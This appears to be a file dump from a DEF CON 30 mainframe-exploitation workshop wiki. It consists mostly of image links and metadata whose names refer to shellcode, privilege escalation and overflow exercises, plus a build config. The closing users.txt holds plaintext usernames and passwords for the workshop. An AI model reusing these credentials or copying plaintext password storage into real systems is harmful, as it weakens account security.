20220805144928761 2 | modified: 20220805144928761 3 | title: arbpoc.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/clistaddress.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/clistaddress.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/clistaddress.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805164544999 2 | modified: 20220805164544999 3 | title: clistaddress.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/dataset user.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/dataset user.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/dataset user.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805063959287 2 | modified: 20220805063959287 3 | title: dataset user.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/debruijnrexx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/debruijnrexx.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/debruijnrexx.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805071129932 2 | modified: 20220805071129932 3 | title: debruijnrexx.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/denied.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/denied.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/denied.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805150805414 2 | modified: 20220805150805414 3 | title: denied.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/editor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/editor.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/editor.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805062724307 2 | modified: 20220805062724307 3 | title: editor.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/emem.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/emem.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/emem.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805063509721 2 | modified: 20220805063509721 3 | title: emem.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/exploitshell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/exploitshell.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/exploitshell.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805231158829 2 | modified: 20220805231158829 3 | title: exploitshell.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/exploitxor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/exploitxor.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/exploitxor.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805231030478 2 | modified: 20220805231030478 3 | title: exploitxor.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/hexhiighlight.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/hexhiighlight.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/hexhiighlight.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805144631082 2 | modified: 20220805144631082 3 | title: hexhiighlight.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/image.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/image.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805063252096 2 | modified: 20220805063252096 3 | title: image.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/image_edit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/image_edit.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/image_edit.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805062632504 2 | modified: 20220805062632504 3 | title: image_edit.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/joblog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/joblog.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/joblog.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805231911859 2 | modified: 20220805231911859 3 | title: joblog.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/lgtbmemory.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/lgtbmemory.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/lgtbmemory.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805065334440 2 | modified: 20220805065334440 3 | title: lgtbmemory.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/linewtosml.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/linewtosml.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/linewtosml.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805211206949 2 | modified: 20220805211206949 3 | title: linewtosml.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/neowhiterabbit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/neowhiterabbit.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/neowhiterabbit.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805070609267 2 | modified: 20220805070609267 3 | title: neowhiterabbit.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/newwtosml.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/newwtosml.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/newwtosml.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805225539027 2 | modified: 20220805225539027 3 | title: newwtosml.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/opentstac0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/opentstac0.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/opentstac0.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805151219640 2 | modified: 20220805151219640 3 | title: opentstac0.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/privesc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/privesc.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/privesc.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805162837947 2 | modified: 20220805162837947 3 | title: privesc.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/putv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/putv.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/putv.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805064347820 2 | modified: 20220805064347820 3 | title: putv.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/rceoverflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/rceoverflow.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/rceoverflow.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805231534738 2 | modified: 20220805231534738 3 | title: rceoverflow.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/shellcodejcl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/shellcodejcl.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/shellcodejcl.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805150001638 2 | modified: 20220805150001638 3 | title: shellcodejcl.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/thebytes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/thebytes.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/thebytes.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805222223285 2 | modified: 20220805222223285 3 | title: thebytes.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/title.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/title.jpg -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/title.jpg.meta: -------------------------------------------------------------------------------- 1 | created: 20220804225613406 2 | modified: 20220804225613406 3 | title: title.jpg 4 | type: image/jpeg -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/wallpaper.3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/wallpaper.3.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/wallpaper.3.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801071846139 2 | modified: 20220801071846139 3 | title: wallpaper.3.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/whiterabbit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/whiterabbit.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/whiterabbit.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805162956628 2 | modified: 20220805162956628 3 | title: whiterabbit.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/youdidit.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/youdidit.jpg -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/youdidit.jpg.meta: -------------------------------------------------------------------------------- 1 | created: 20220804225517697 2 | modified: 20220804225517697 3 | title: youdidit.jpg 4 | type: image/jpeg -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlywiki.info: -------------------------------------------------------------------------------- 1 | { 2 | "description": "Basic client-server edition", 3 | "plugins": [ 4 | "tiddlywiki/tiddlyweb", 5 | "tiddlywiki/filesystem", 6 | "tiddlywiki/highlight" 7 | ], 8 | "themes": [ 9 | "tiddlywiki/vanilla", 10 | "tiddlywiki/snowwhite" 11 | ], 12 | "build": { 13 | "index": [ 14 | "--rendertiddler", 15 | "$:/plugins/tiddlywiki/tiddlyweb/save/offline", 16 | "index.html", 17 | "text/plain" 18 | ], 19 | "static": [ 20 | "--rendertiddler", 21 | "$:/core/templates/static.template.html", 22 | "static.html", 23 | "text/plain", 24 | "--rendertiddler", 25 | "$:/core/templates/alltiddlers.template.html", 26 | "alltiddlers.html", 27 | "text/plain", 28 | "--rendertiddlers", 29 | "[!is[system]]", 30 | "$:/core/templates/static.tiddler.html", 31 | "static", 32 | "text/plain", 33 | "--rendertiddler", 34 | "$:/core/templates/static.template.css", 35 | "static/static.css", 36 | "text/plain" 37 | ] 38 | } 39 | } -------------------------------------------------------------------------------- /wiki/users.txt: -------------------------------------------------------------------------------- 1 | username,password 2 | defcon,class! 3 | jake,Unhackable 4 | phil,Mainframes4lyfe --------------------------------------------------------------------------------